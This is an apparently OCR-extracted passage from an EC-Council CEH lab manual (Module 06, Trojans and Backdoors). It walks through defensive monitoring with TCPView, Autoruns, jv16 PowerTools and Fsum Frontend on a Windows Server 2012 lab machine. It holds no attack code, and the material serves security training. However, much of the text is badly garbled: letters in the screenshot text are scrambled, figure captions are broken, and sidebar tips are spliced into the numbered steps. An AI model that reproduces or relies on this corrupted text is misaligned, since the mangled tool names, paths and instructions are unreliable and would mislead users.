> ___________ ___________ ___________ ___________ ___________ U FIGURE 8 :TcpviewMainwindow .1 tool perform port m onitoring. T P ie -S C V w ysin rn ls: w w te a w .sysin rn ls.co I ~ I □ f te a m 1 File O tion P cess View H lp p s ro e y a ‫@ !־‬ P c ss ' ro e P ID P to o ro c l L c lA d s o a d re s |L c l P rt oa o 11s c o t.e e 3 5 1 vh s x 8S ICP W - N S 0 G 50 IN 2 9 T S I.. 5 4 (0 sv o x 8 2 ch ste e 9 tCP W - N S OG 413 IN 2 9 T S I.. 9 5 H s c o t.e e 9 0 vh s x 6 ICP W - N S O G 414 IN 2 9 T S L 9 5 1 s c o t.e e 1 5 1 vh s x 52 ICP W - N S O G 419 IN 2 9 T S L 9 5 ITI s c o t.e e 2 8 vh s x 14 ICP W - N S 0 G 4 11 IN 2 9 T S I.. 96 S3 s c o t.e e 3 4 vh s x 40 TP C W - N S OG 413 IN 2 9 T S I.. 9 6 S3 s c o t.e e 4 1 vh s x 32 TP C W - N S 0 G 418 IN 2 9 T S I.. 9 6 S3 s c o t.e e 4 7 vh s x 22 TP C W - N S OG 419 IN 2 9 T S I.. 9 6 S3 s c o t.e e 1 0 vh s x 88 TP C W - N ST SG 4 1 7 IN 2 9 0 L 9 8 1 s c o t.e e 1 5 '‫ י‬v h s x 52 UP D w - n s s ie in 2 9tog n b o s o tp S3 s c o t.e e 1 5 vh s x 52 UP D w - n s s ie in 2 9tog n b o c o tp 1‫ י‬s c o t.e e 9 0 ' vh s x S UP D W - N S 0 G is k p IN 2 9 T S I... a m UP D w - n s s ie in 2 9tog n 2 3 S3 s c o t.e e 1 5 vh s x 52 55 1 s c o t.e e 3 9 3 vh s x 02 UP D W - N S O G 39 IN 2 9 T S L 31 E3 s c o t.e e 9 0 vh s x 6 UP D W - N ST SG te d IN 2 9 0 L re o S3 s c o t.e e 9 0 vh s x 6 UP D W - N S 0 G ipe- s IN 2 9 T S I... s c mft S3 sv o x 1 6 ch ste e 0 4 UP D W - N S O G llmr IN 2 9 T S L n S3 s c o t.e e 9 0 vh s x 6 UP D w - n s s ie in 2 9tog n 541 34 4 T7 S s m y te TP C w - n s s ie in 2 9tog n n tb s s n e io-s 4 1 ‫ י‬Ss m y te TP C w - n s s ie in 2 9tog n mr s f- s icoot d 4 •1S s m y te TP C w - n s s ie in 2 9tog n mr s f- s icoot d •' S s m y te 4 TP C W - N S OG h IN 2 9 T S I... ttp 4 7‫ י י‬Ss m y te TP C W - N S OG h s IN 2 9 T S I... ttp T 7 Ss m y te 4 TP C W - N S O G mr s f- s IN 2 9 T S I... icoot d •1S s m y te 4 TP C W - N S OG 58 IN 2 9 T S I... 9 5 III n Cl If you are running Autoruns without administrative privileges on Windows Vista and attem pt to change die state of a global entry, you'll be denied access X 1 ^ R W l W l W l W l W l W l W l W l W l * * W l w ir w ir W l W l Wl Wl v > FIGURE 8 :TcpviewMainwindow .2 5. C E H La b M anual Page 471 N ow it is analyzing die SM T P and odier ports. E th ic a l H ack in g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 49. M o d u le 0 6 - T ro ja n s a n d B a c k d o o rs TCPView -Sysinternals: www.sysinternals.com File y & Autoruns will display a dialogwith abutton that enables you to re-launch Autoruns with administrative rights. You can also use the e com and-line option to m launch initially launch Autoruns with administrative rights Cl There are several w to ays get m information about ore anautorun location or entry. To view alocation or entry in Explorer or Regedit choseJump To in the Entry m or double-click on the enu entry or location's line in the display Options Process View ‫ד‬ Help a “ too ro c l C P C P C P C P C P C P C P C P C P C P D P D P D P D P D P D P D P D P D P C P C P C P C P C P C P < L ca A d s o l d re s W -2 9 0 L IN N ST SG W -2 9 0 L IN N ST SG W -2 9 0 L IN N ST SG W -2 9 0 L IN N ST SG W -2 9 0 L IN N ST SG W -2 9 0 L IN N ST SG W -2 9 0 L IN N ST SG W -2 9 0 L IN N ST SG W -2 9 0 L IN N ST SG W -2 9 0 L IN N ST SG w - n s s ie in 2 9tog n w - n s s ie in 2 9tog n W -2 9 0 L IN N ST SG w - n s s ie in 2 9tog n W -2 9 0 L IN N ST SG W -2 9 0 L IN N ST SG W - N S OG IN 2 9 T S L W -2 9 0 L IN N ST SG w - n s s ie in 2 9tog n w - n s s ie in 2 9tog n w>29t s ie ir - n sog n wv n $ s ie ir 2 9 tog n W -2 9 0 L IN N ST SG W -2 9 0 L IN N ST SG W -2 9 0 L IN N ST SG L ca P rt o lo 38 38 50 54 413 95 414 95 419 95 411 96 413 98 418 96 419 96 417 98 bo s o tp bo c o tp is k p am 23 55 39 31 te d re o ip e mft sc s llmr n 5 41 34 n tb s s n e io-s mr s f- s icoot d mr s f- s icoot d h ttp h s ttp mr s f- s icoot d III R m teA d s e o d re s W - N ST SG IN 2 9 0 L W - N ST SG IN 2 9 0 L W -2 9 0 L IN N ST SG W - N S 0G IN 2 9 T S I.. W - N S 0G IN 2 9 T S I.. W - N S 0G IN 2 9 T S I.. W - N S 0G IN 2 9 T S I.. W - N S 0G IN 2 9 T S I.. W - N S 0G IN 2 9 T S I.. W - N S 0G IN 2 9 T S I.. x R m teP tt eo o 0 0 0 0 0 0 0 0 0 0 * * * ‫יי‬ ‫יי‬ ‫יי‬ ‫יי‬ * ‫יי‬ ‫יי‬ ‫יי‬ ‫יי‬ ‫יי‬ ‫י‬ ‫י‬ Stat LIST LIST LIST LIST LIST LIST LIST LIST LIST LIST * ‫יי‬ W - N ST SG 0 IN 2 9 0 L w - g h g40 4 1 8 in e b is l 1 95 w d w8 in o s 441 98 0 W - NS 0 G IN2 9 T S I.. W - N S 0G 0 IN 2 9 T S I.. W - N S 0G 0 IN 2 9 T S I.. . ‫ך‬ LIST EST, EST, LIST LIST LIST ‫ח־‬ FIGURE 8 :Tcpviewan .3 alyzin ports g Y o u can also kill die process by double-clicking diat respective process, and then clicking die End Pro cess button. Properties for dns.exe: 1572 | ‫ך־‬ Domain Name System (DNS) Server M icrosoft Corporation Version: G .02.8400.0000 Path: C:WindowsSystem32dns.exe End Process OK FIGURE 8 : Killing .4 Processes 1m TASK 2 Autoruns G o to W indow s Server 2012 V irtual M achine. Double-click Autoruns.exe, w hich is located at D:CEH-ToolsCEHv8 Module 06 Trojans and BackdoorsProcess M onitoring ToolsAutoruns. It lists all processes. D LLs, and services. C E H La b M anual Page 472 E th ic a l H ack in g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 50. M o d u le 0 6 - T ro ja n s a n d B a c k d o o rs O Autoruns [WIN-2N9STOSGIENAdministrator] ‫ ־‬Sysinternals: www.sysinter.J ~ File Entry Options ] Hijacks User Help Image3 |ExecuteBoot3 |CodecsJ 1ft Winsock Providers ] O Everything ^ Logon | Print Monitors | LSA Providers | < Explorer | & Internet Explorer | J ,‫ ►־‬Applnit $ | ,‫־‬V KnownDLLs £ ‫ ־‬Network Providers | 9 . Sidebar Gadgets Scheduled Tasks | Services | Drivers Autorun Entry Description Publisher Image Path ■}jf HKLMSOFTWAREMicrosoftWindow$ NTCurrentVers10nWinl0g0nl'AppS etup 0 g ] UsrLogon cmd c:windowssystern32usrlo... HKLMS 0 FTWAR EM icrosoftWindowsCurrentVersionRun 0 [ ij] HotKeysCmds hkcmd Module Intel Corporation c: windowssystem32hkc... 0 £ IgfxTray 3 igfxTray Module Intel Corporation c:windowssystem32igfxtr. .. 0 fil Persistence persistence Module Intel Corporation c:windowssystem32igfxp... $ HKLMS 0 FTWAREW0w6432N odeM icrosoftWmdowsCurrentVersionR un E Adobe ARM Adobe Reader and Acrobat... Adobe Systems Incorporated c:program files (x86)Vcomm.. 0 0 Adobe Reader Adobe Acrobat SpeedLaun.. Adobe Systems Incorporated c:program files (x86)adob 0 EPS0N_UD_S.. EPSON USB Display VI 40 SEIKO EPSON CORPORA.. c:program files (x86)epso... r‫־‬a r ‫־‬ .. ■ ______ ^ . T ■ _______________ ^ ._____________________ ._______ ™ , **** . Ci You canview Explorer's file properties dialog for an entry's im file by age choosing Properties in die Entry m You can also enu. have Autoruns automatically execute anInternet searchin your browser by selecting Search Online in the Entry m enu. Ready Windows Entries Hidden. FIGURE 8 :AutorunsMainWindow .5 & Simply run Autoruns andit show you die s currendyconfigured a to u start applications in the locations that m direcdy ost execute applications. Perform anewscan that reflects changes to options byrefreshing die display C Internet Explorer This Q entry show Browser Helper s Objects (BHO's), Internet Explorer toolbars and extensions 1°- follow ing is the detailed list on the Logon tab. O Autoruns [WIN-2N9STOSGIENAdministrator] - Sysinternals: www.sysinter...L I File Entry Options User Help d is) ^ 1 X ^ H Codacs | P Boot Execute | ^ i f : Winsock Providers !3 Everything | ^ Explorer Image Hjacks Print Monitors Logon | [ j) Applnit LSA Providers 4$ Internet Explorer Autorun Entry Description 0 [ ij] HotKeysCmds hkcmd Module 0 lafxTrav igfxTray Module 0 lil Persistence persistence Module £ | |j») KnownDLLs | Network Providers | '1 Scheduled Tasks | Publisher Intel Corporation Intel Corporation Intel Corporation ^ Wnlogon Sidebar Gadgets Services ^ Drivers Image Path c:windomsystem32hkc... c:windowssystem32igfxtr c:windowssystem32igfxp . S 0 E3 Adobe ARM Adobe Reader and Acrobat. . Adobe Systems Incorporated c:program files (x86)comm.. 0 Adobe Reader... Adobe Acrobat SpeedLaun... Adobe Systems Incorporated c:prograrn files (x86)adob.. 0 EPS0N_UD_S. EPSON USB Display V I.40 SEIKO EPSON CORPORA... c:program files (x86)epso. 9 googletalk Google Tak Google c:program files (x86)Vgoogl. 0 fH SurvlavaUpdat JavalTM) Update Scheduler Sun Microsystems, Inc. c:program files |x86)Vcomm t S C:ProgramDataVM1c10 softWrKlowsStart MenuVProgramsStartup 0 Ready Windows Entries Hidden FIGURE 8 :Autom Logonlist .9 ns 11. The follow ing are die Explorer list details. C E H Lab M anual Page 473 E th ic a l H ack in g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited. | A Wriogo
  • 51. M o d u le 0 6 - T ro ja n s a n d B a c k d o o rs O Autoruns [WIN-2N9STOSGIENAdministrator] ‫ ־‬Sysinternals: www.sysinter...L File Entry | Codecs Services All Windows services configured to start automaticallywhen the systemboots. Options | 3 User Boot Execute Winsock Providers | & Z ? Everything | ^ Help | 3 1 Print Monitors * Logon[ ,j Explorer Image H^acks | £ | '■ Applnit > LSA Providers | | ' KnownDLLs ] Network Providers | Internet Explorer | J Scheduled Tasks | A W nbgon Sidebar Gadgets Services | Drivers Autorun Entry Description Publisher Image Path HKLMS 0 FTWAR EClassesProtocoisF*er 0 ^ te x t/x m l Microsoft Office XML MIME... Microsoft Corporation c:programfilescommonfi.. • iff HKLMS oftwareClassesx heC xVContextMenuHandlers S 0 ^ SnagltMainSh... Snagit Shell Extension DLL TechSmith Corporationc:program files (x86 )techs.. 0 fo‫־‬ WinRAR WinRAR shel extension Alexander Roshal c:programfileswinrarrare. HKLM S 0ftwareW0w6432N0deClassesx helE xContextM enuH andlers S 0 SnagltMainSh. Snagit Shell Extension DLL TechS mith Corporation c:program files (x86 )techs.. 0 *V WinRAR32 WinRAR shel extension Alexander Roshal c:programfileswinrarrare. HKLM S oftwareClassesD »ectoryS heMExSContextM enuH andlers 0 SnagltMainSh Snagit Shell Extension DLL TechS mith Corporation Ready c:program files (x8S)techs. Windows Entries Hidden. FIGURE 8 0 AutoninsExplorer list .1 : 12. T lie follow ing are die Service s list details. O Autoruns [WIN-2N9STOSGIENAdministrator] - Sysinternals: www.sysinter...L File *J Entry & H (3 Drivers This displays all 3 kernel-m drivers ode registered on tlie system except those that are disabled & Codecs Options User | ‫־־‬I Boot Execute fc?; Winsock Providers | O Help B X * Everything | ^ ] 3 & Print Monitors Logon | Image hijacks Explow [ j | [^ Applnit LSA Providers Internet Explorer f | S cheduled Tasks | Publisher Autorun Entry Description g HKLMSystemCurrentControlSetServices 0 [ 1 ‫ י‬AdobeFlashPta This service keeps you Ad... Adobe Systems Incorporated 0 [■1 c2wts Service to convert claims b .. Microsoft Corporation 0 0 EMPJJDSA EPSON USB Display VI 40 SEIKO EPSON CORPORA.. 0 F I M02illaMainten... The Mozia Maintenance S. . Mozilla Foundation 0 F I ose Savesinstalationfilesused .. Microsoft Corporation 0 F I osoosvc Office Software Protection... Microsoft Corporation 0 H WSusCertServer This service manages the c... Microsoft Corporation Ready KnownDLLs Network Providers 1 | ^ Wintogon Sidebar Gadoets Services Drivers Image Path c: windowssyswow64ma c:program filesNwindows id.. c:program files (x86 )epso... c:program files (x86 |m02i ... c:program files (x86)comm c:program file$common fi c:program filesVupdate ser Windows Entries Hidden FIGURE 8 1 Autoruns Serviceslist .1 : 13. T lie follow ing are die D rivers list details. C E H La b M anual Page 474 E th ic a l H ack in g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 52. M o d u le 0 6 - T ro ja n s a n d B a c k d o o rs O Autoruns [WIN-2N9STOSGIENAdministrator] ‫ ־‬Sysinternals: www.sysinter...L File Entry 3 Options User Image H^acks |ExecuteBoot! 3 |CodecsH & Print Monroes ft Winsock Providers [ O Everything £9 Scheduled T asks Task scheduler tasks configured to start at boot or logon | Help | $ Logon | . < Explorer | ^ Autorun Entry [ LSA Providers* | £‫ ־‬Network Providers | Internet Explorer | J Description Scheduled Tasks | Publisher ,‫ $־‬Applnit Sidebar Gadgets Services Drivers Image Path HKLMSystemCurrentControlSetServices |LSI 3ware SCSI Storpoct Driver}SI c: windowssystem32drrve. S ) adp94xx( Adaptec Windows SAS/SA... Adaptecjnc. c: windowssystem32drrve. adpahci ^ Adaptec Windows SATA S t.. Adaptec, Inc. c: windowssystem32drive. adpu320 ^ Adaptec StorPort Ultra320... Adaptecjnc. c: window$system32drrve. ,amdsata 4 ‫־‬ AHD 1.2 Device Driver c: windowssystem32drive. amdsbs ^ AM D Technology AH Cl Co... AM D Technologies Inc. c: windowssystem32drive. amdxata ^ S torage Filter Driver c: window$system32drive. ^ 3ware Advanced Micro Devices AdvancedMicroD evices Adaptec RAID Storpoct Driver PMC-Sierra, Inc. c: windowsSsystem32drrve. Adaptec SAS RAID W S0 3 ... PMC-SierraJnc. arcsas & c: window$system32drive. Ready Windows Entries Hidden. FIGURE 8 2 AutorunsDriverslist. .1 : 14. The follow ing is die Know nD LLs list 111 Antonins. O Autoruns [WIN-2N9STOSGIENAdministrator] ‫ ־‬Sysinternals: www.sysinter...L File Entry Options User Help d j) & B X * I?• Winsock Providers | ‫כ‬ Everythin Ever/hing Q Codecs O ^ ^ Logon | Q Print Monitors | ^ Explorer ] Boot Execute Autorun Entry | Description & LSA Providers | Internet Explorer ] J f"^ Image Hijacks | f Network Providers | 9• Sidebar Gadgets Scheduled Tasks 1 [j| Applnit Publisher Services [ KnownDLLs j Drivers Winlogon Image Path ijT HKLM SystemCurrentControlSetControfSession ManagerKnownDII$ 0 13 _W0w64 File not found: C:Wndows... 0 1‫ר‬ W ow 64cpu File 0 11 Wow64win File not found: C:Wndows. .. Ready not found: C:Wndows. Windows Entries Hidden FIGURE 8 3 AutoruasKnownDLL’slist. .1 : 15. Install and launch jv16 Pow erTools 111 W indow s Server 2012 (host m achine). T A S K 4 16. jv l6 Pow er T ool is located at D:CEH-ToolsCEHv8 Module 06 Trojans and BackdoorsRegistry M onitoring Toolsjv16 Pow er Tools 2012. Jv1 6 Pow er Tool 17. T o launch jv16 Pow erTools, select die S ta rt menu by hovering die mouse cursor on die lower-left corner ot die desktop. C E H La b M anual Page 475 E th ic a l H ack in g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited. | ,‫ ־‬KnownDLLs V | A
  • 53. M o d u le 0 6 - T ro ja n s a n d B a c k d o o rs u ‫״‬nilb ‫י‬ U R ta n €r (t n a aP PmT... k ti ■ W d w S rv r21 3 in o s e e 02 W o tS rv r21 R c teC nx tr C u rn ird w e e 02 o a a c fa a c t. fv lu to c p.Eud* 0 ca a r o y 4. .. .* JL JL . ‫ל‬ 1 FIGURE 7 : Windows Server 2 1 Start-Desktop .1 02 18. C lick jv16 Po w erT oo ls 2012 111 S ta rt m enu apps. Administrator A Start 03 Winlogon Notifications Shows DLLs that register for Winlogon notification oflogon events FIGURE 7 : Windows Server 2 1 Start Menu Apps .2 02 19. C lick the Clean and fix my com puter icon. C] Winsock Providers Shows registeredWinsock protocols, including Winsock service providers. Malware often installs itself a aWinsock service s provider because there are few tools that canrem ove them Autoruns canuninstall . them but cannot disable , them C E H La b M anual Page 476 E th ic a l H ack in g and Countem ieasures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 54. M o d u le 0 6 - T ro ja n s a n d B a c k d o o rs P 1 jv l 6 PowerTools 2012 E*e Language O lo o k K Help r Trad L rnM Don n E ffect - 60 d ays le ft Live Support: O nlne Handbook not avadaWe Hom e Registry Tools ‫ו^ד‬ File Tools i System Tools Fully remove softw are and leftovers Speed up my computer Immunize my computer Verify my downloads are safe to a n Privacy Tools — Backups Control which programs start autom abcaly A cton H sto ry LUJ Settings Trial Reminder ■ 92<*> Registry Health 9SV0 PC Health j v l 6 PowerTools (2 .1 .0 .1 1 7 3 ) runnng on D atacenter Edition (x6 4) with 7 .9 GB o f RAM [ 1 0 : 2 9 : 4 5 ‫ ־‬T ip ]: Your system has now been analyzed. The health score o f your computer ts 95 out o f 100 and the health score o f y o ir W ndow s r e g s try 6 9 2 o u t o f 100. I f you scored under 100 you can improve! the ratings by usrtg the O ean and F a M y Computer tool. FIGURE 8 0 jvl6Hom p g . .2 : e ae 20. The Clean and fix my com puter dialog box appears. C lick the Settin g s tab and then click die S ta rt button. jv l 6 Pow erTools 2012 [W8-X&4] - Clean and fix m y co m p uter □ gs S ttin e A d nl d itio a s fe a ty # A d nl d itio a ot n pio s * L i 10 S a h Ig oewr s e rc n r od wr s od Settings Emphasize safety over both scan speed and the number o f found errors. A Emphasize the number o f found errors and speed over safety and accuracy. Selected setting: H C E H La b M anual Page 477 Normal system scan policy: all Windows-related data is skipped for additional safety. Only old temp files are listed. Cancel E th ic a l H ack in g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 55. (3 LSA Providers Shows S registers Local Security Authority (LSA) authentication, notification and securityp ackages M o d u le 0 6 - T ro ja n s a n d B a c k d o o rs FIGURE 8 1 jvl6 Cleanan fixm com uterd g e .2 : d y p ialo u . 21. It w ill analyze your system for tiles; this w ill take a few minutes. 1 jv16 PowerTools 2012 [W8-x64] - Clean and fix my com puter! ‫־‬ -1 File Select Tools I ‫ם‬P x Help [ ‫יג‬ Analyzing your computer. This can take a few minutes. Please wait... Abort ‫ ט‬Printer Monitor Drivers Displays DLLs that load into the print spooling service. Malware hasused this support to autostart itself FIGURE 8 2 jvl6 Cleanan fixm com uterA .2 : d y p nalyzing. 22. Com puter items w ill be listed after die complete analysis. iv16 PowerTools 2012 rW8-x641 - Clean and fix mv comDuter! ‫־‬ L J You can save die results of a scanwith File->Save and load a saved scanwidi File->Load. These com ands work with native m Autoruns file form but ats, you canuse File->Export to save a text-onlyversion of the scanresults. You can also autom the generation ate of native Autoruns export files with com andline m options File Select Tools ! ‫ ם‬r x Help Item Severity Description Tags Item / Seventy Descrpbon Tags ........................ !3 Registry Errors 7 !‫־‬I ^ 7 Invalid file or directory reference I ] c ) Registry junk ‫ח‬ |~1 ‫ח‬ ^ 266 ♦ Obsolete software entry J 4 Useless empty key 146 ♦ Useless file extension J 116 + Start menu and desktop items J I 23 - II Delete dose Selected: 0, highlighted: 0, total: 296 FIGURE 8 4 jvl6 Cleanan fixm com uterItem d ils. .2 : d y p s eta 23. Selected item details are as follows. L J Sidebar Displays Windows sidebar g g ad ets C E H La b M anual Page 478 E th ic a l H ack in g and Countenneasures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 56. M o d u le 0 6 - T ro ja n s a n d B a c k d o o rs jv16 PowerTools 2012 [W8-x64] - Clean and fix my computer File Select Tools Help Item Seventy Description Tags Item / Descryton Seventy Tags A 7 13 Registry Errors 13 ‫ח‬ Invalid tile 01 directory ‫ כ‬HKCRUnstall reference :3 % 1HKCRUnstal = Fie or directory 'C: ^ HKLMsoftw< 13% Ne or directory X : FJe or directory X : _ ] HKLMsottw;^B □ HKLMSOFT/ 13% □ HKLMSOFTl H Com pare the current Autoruns displaywith previous results that you've saved. Select File |Compare and browse to the saved file. Autoruns will displayin green any new item which s, correspond to entries that are not present in the saved file. Note that it does not showdeleted item s 7 FJe or directory X : 13% _ | HKLMS0ttwi File or directory X : Fie or directory X : File or directory X : 266 □ 13 Registry junk Selected: 0, highlighted: 0, total: 296 FIGURE 8 3 jvl6 Cleana dfixm com .2 : n y pute! Item s. 24. The R egistry junk section provides details for selected items. 1‫ י‬jv16 PowerTools 2012 [W8‫־‬x64]~ Clean and fix my computer! ‫־‬ File [‫־‬J If you are running ‫־‬ Autoruns without administrative privileges on Windows Vista and attem pt to change die state of a global entry, you'll be denied access. Autoruns will display adialogwith abutton that enables you to re-launch Autoruns with administrative rights V Select Tools ‫ם‬ * Help Item Severity Description Tags Item _] 3 / Severity Description Tags Registry junk 3 ‫ח‬ 266 Obsolete software entry 4 □ HKCUVSoftw 30% Obsolete software e □ HKCU^oftw 30% Obsolete software { □ HKUSS-1-S- 30% Obsolete software ‫ז‬ □ HKUSV1-5- 30% Obsolete software e □ (3 Oseless empty key 146 □ HKCRVaaot | 10% Useless empty key □ HKCRVaaot 20% Useless empty key □ HKCRVacrot 20% Useless empty key ‫ ח‬MKCRV.aaot 20% Useless emotv kev ‫✓י‬ Selected: 0, highlighted: 0, total: 296 FIGURE 8 5 jvl6 Cleanan fixm com uterItemregistryju k .2 : d y p n. 25. Select all check boxes 111 die item list and click D elete. A dialog box appears. C lick Yes. — L&S fcslilfifl Page 4 9 7 Empty Locations selection in die Options m is enu checked Autoruns doesn't showlocations with no entries E th ic a l H ack in g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 57. M o d u le 0 6 - T ro ja n s a n d B a c k d o o rs jv16 PowerTools 2012 [W8-x64] - Clean and fix my computer[ F S le t T o H lp ile e c o ls e Item Seventy Description Tags Item Seventy 0J Descnptran Tags jv16 PowerTools 2012 You are about to delete a lot of erroneous registry data. Using the Fix option is always the better option. Are you sure you know what you are doing and want to proceed? 0 *I O S la il menu and desktop items 23/23 Selectedj29^highlightedfttotah296 FIGURE 8 6 jvl6 C a dfixm com .2 : lean n y pute!Itemcheckb x o. 26. G o to the Home tab, and click die Control w hich program s start au to m atically icon. C E H La b M anual Page 480 E th ic a l H ack in g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 58. UJ The Verify Signatures option appears in the Options m on system enu s that support im signing age verification andcan result in Autoruns querying certificate revocation list (CRL) web sites to determ if im ine age signatures are valid M o d u le 0 6 - T ro ja n s a n d B a c k d o o rs FIGURE 8 8 jvl6 Controlwhichp ramstart au m .2 : rog to atically. 27. Check programs in Startup m anager, and then you can select die appropriate action. T Z S jv16 PowerTools 2012 [W8-x64] - Startup Manager File Cl The Hide Microsoft Entries selection om its im ages that have been signed byMicrosoft if Verify Signatures is selected and om im its ages that have Microsoft in their resource's com panynam e field if Verify Signatures is not selected Select Tools Help Enabled System entry No Program )usched.exe C: program Files (x86)VCommon 1 Filename Command Ine 'C:program FJes (x86)Common FTVV< Loaded from rt<EY_LOCAL,MACHINE SO JavaCTM) Update SchecUer Descrption Tags Enabled / ‫־‬ Process running Yes PID Threads 4280 4 Base priority Normal Memory usage 9.12 MB Page file usage 2.23 MB File size 246.92 KB Descrption Program Tags 10 — |l 1Found software C:program Files □ Yes googletalk.exe Google Talk □ Yes EMP_UO.exe EPSON USB Dispk C:Program Files □ Yes Reader_sl.exe Adobe Acrobat S| C:program Files S )usched.exe I ‫מ׳‬ i ■ Yes C: program Files □ Yes AdobeARM.exe Adobe Reader ar1C:program Files □ Yes 1 gfxtray.exe igfxTray Module C:Windowsteyst □ Yes hkcmd.exe hkcmd Module □ Yes 1 gfxpers.exe = persistence Modi‫״‬C:Windowsfeyst C:Windows^yst FIGURE 8 9 jvl6 StartupM .2 : anagerD ialogue. 28. C lick die R eg istry Tools menu to view registry icons. f! File B3 Use the Hide Microsoft Entries or Hide Windows Entries in the Options m to help youidentify enu software that's been ad ed d to a systemsince installation. Autoruns prefixes the nam e of anim s publisher with age' "(Not verified)" if it cannot verify adigital signature for the file dial's trusted by the system jv1 Po erT o 2 1 6 w o ls 0 2 Language Tools Help IMACECRAFT >SOFTWARE Trial Urn ta bon n Effect - 60 days left Live Support: Online L Handbook not avaiaW e $ m 49 R eg s try Manager R e g istry Tools Registry F ^ der Registry Find & Replace m R eg etry Compactor Registry Information Registry Monitor Registry Cleaner System Tools ^ Privacy Tools Backups A cto n H sto ry IU I Settings 10 0% Trial Reminder Registry Health You a re using the free trial version o f j v l 6 PowerTools. Pick h ere to buy the real version' FIGURE 8 0 jvl6 Registryto ls. .3 : o 29. C lick F ile Tools to view hie icons. C E H La b M anual Page 481 E th ic a l H ack in g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 59. M o d u le 0 6 - T ro ja n s a n d B a c k d o o rs E 1The Hide Windows E Entries om im its ages signed byWindows if Verify Signatures is selected. If Verify Signatures is not selected, Hide Windows Entries om im its ages that have Microsoft in their resource's com panynam e field and the im resides age beneaththe %SvstemRoot% directory FIGURE 8 1 jvl6 File too .3 : ls. 30. C lick System Tools ro view system icons. jv1 Po erT o 2 1 6 w o ls 0 2 Fite Language Io o ls I MACECRAFT ' SOFTWARE x Help Trial Limtabon in E ffect - 60 d ays left Live Support: Online L Handbook not avaiaW e Home Registry Tools U Softw are Unrts ta le r !Im■! ^ Q j EH Startup Manager Service Manager S tart M enu Tool Automation Tool System Optimizer S y s te m Tools Privacy Tools Backups Action History IQ I Settings 10 0% Trial Reminder Registry Health & Tools dem onstrated in th is lab are availab le in D:CEHToolsCEHv8 M odule 06 Trojans §a<&d9fl»‫־‬ Page 4 2 8 You a re using th e free trial version o f j v l 6 PowerTools. Clioreal version! to b u y the FIGURE 8 2 jv!6 Systemto ls. .3 : o E th ic a l H ack in g and Countem ieasures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 60. M o d u le 0 6 - T ro ja n s a n d B a c k d o o rs 31. C lick Priva cy tools to view privacy icon. jv16 PowerTools 2012 I E*e !,*"Quage 1001* Help 1 MACECRAFT Trial Lm tabon in Effect - 60 days left ' SO FTW ARE A L Handbook not avarfable Live Support: Online Registry Too*s history Oeaner 1^ ‫ך‬ F ie Tools B Disk Wiper System Tools Backups Actjon H story | L lj Settings 3 Trial Reminder You are usng the free trial version o f jv 16 PowerTools. C k k here to buy the real version ‫י‬ FIGURE 8 3 jvl6 Privacytoo .3 : ls. 32. C lick Backups in die menu to display die Backup Tool dialog box. T^TeT x T jv16 PowerTools 2012 £Q You can com pare the current Autoruns display w ith previous results th at you've saved. S e le ct File|Com pare and brow se to the saved file . Autoruns w ill display in green any new item s, w hich correspond to en tries th at are not present in the saved file . Note th at it does not show deleted item s File Language O £He loots Help MACECRAFT Trial Umitabon in E ffect - 60 days le ft SO FTW ARE Live Support: jv16 PowerTools 2012 [W8‫־‬x64] ‫ ־‬Backup Tool Select Registry Backups Descnptjon look I~ I L Handbook not x 1 Help Fie Backups Type Other Backups Size ID C reated Q 13 File Backups □ Clean and D ata removed 3 4 .6 KB 00062D 2 1 .0 9 .2 0 1 2 , R S je te ^ u h h d ^ ta e e c d ^ g liq te ^ o M ■ FIGURE 8 4 jvl6 Backuptook .3 : C E H La b M anual Page 483 E th ic a l H ack in g and Countenneasures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 61. M o d u le 0 6 - T ro ja n s a n d B a c k d o o rs 33. G o to W indow s Server 2 0 12 Virtual M achine. = TASK 5 Fsum FrontEnd 34. Double-click Fsum FrontEnd.exe, the executable tile located at D:CEHToolsCEHv8 Module 06 Trojans and BackdoorsFiles and Folder In tegrity CheckerFsum Frontend. 35. The Fsum Frontend main w indow is shown 111 the follow ing screenshot iz r^ * ‫׳‬ Fsum Frontend vl .5.5.1 ESS B - Q Fsum Frontend Tools □ ₪ B - Q Calculate hashe n Methods (96) ‫ ח‬ap hash C bdkr n crc16_ccitt H I crc16_ibm □ <rc16_125 □ crcl6_zmodem □ crcM □ crcJZ I crc32_br1p2 Z d crc32jamcrc 1 i crc.54 ( j djb hash d dhoZ35 (7e o ky d nc 5E=: : ‫ ח‬adlcrS Q adlcr15 ‫ ח‬ct£um_mp€c2 Q crc8 Verify checksur 3&■■: □ crcl6_xr‫־>־‬dem i Tod 23 - : ■ ■ *Generate chec Options 0 5 ! ‫•״״‬ About c1c32_mpcg2 n dF32 Q adler32 f ‫־‬l crc16 O crc64_ecma (_) flctchcr8 Q fletchcrl 6 Q . fletcher32 Cv -2 f O2 n L f n 1 / ‫י‬ Compare Hth a: lS a .U a Encoding: Bate 16 (hexadecimal) C?Log 2 ‫,״‬ Web sits htipi.'/fsumfesourcefoi & CEH-Tools are also located mapped N etw ork D rive (Z :) of V irtual M achines FIGURE 8 5 FsumFrontEndm w .3 : ain indow . 36. Select the type ot hash that you want; let’s say md5. Check die md5 check box. Fsum Frontend v1.5.5.1 _ Fsum Frontend .t . ___...x ......... (_J haval224 (3) u b*val224 (4) u haval224 (5) Lhoval256(3) Tort ■ □ j □ /wch Q jihJKh □ wnti? C l «nd4 1 0 Verify checksur Generate chace Dpjwr32 Tool* I HI‫ ־‬Clclaehih - aut a t &>* ■ ! ; 8 8 Options ™ v 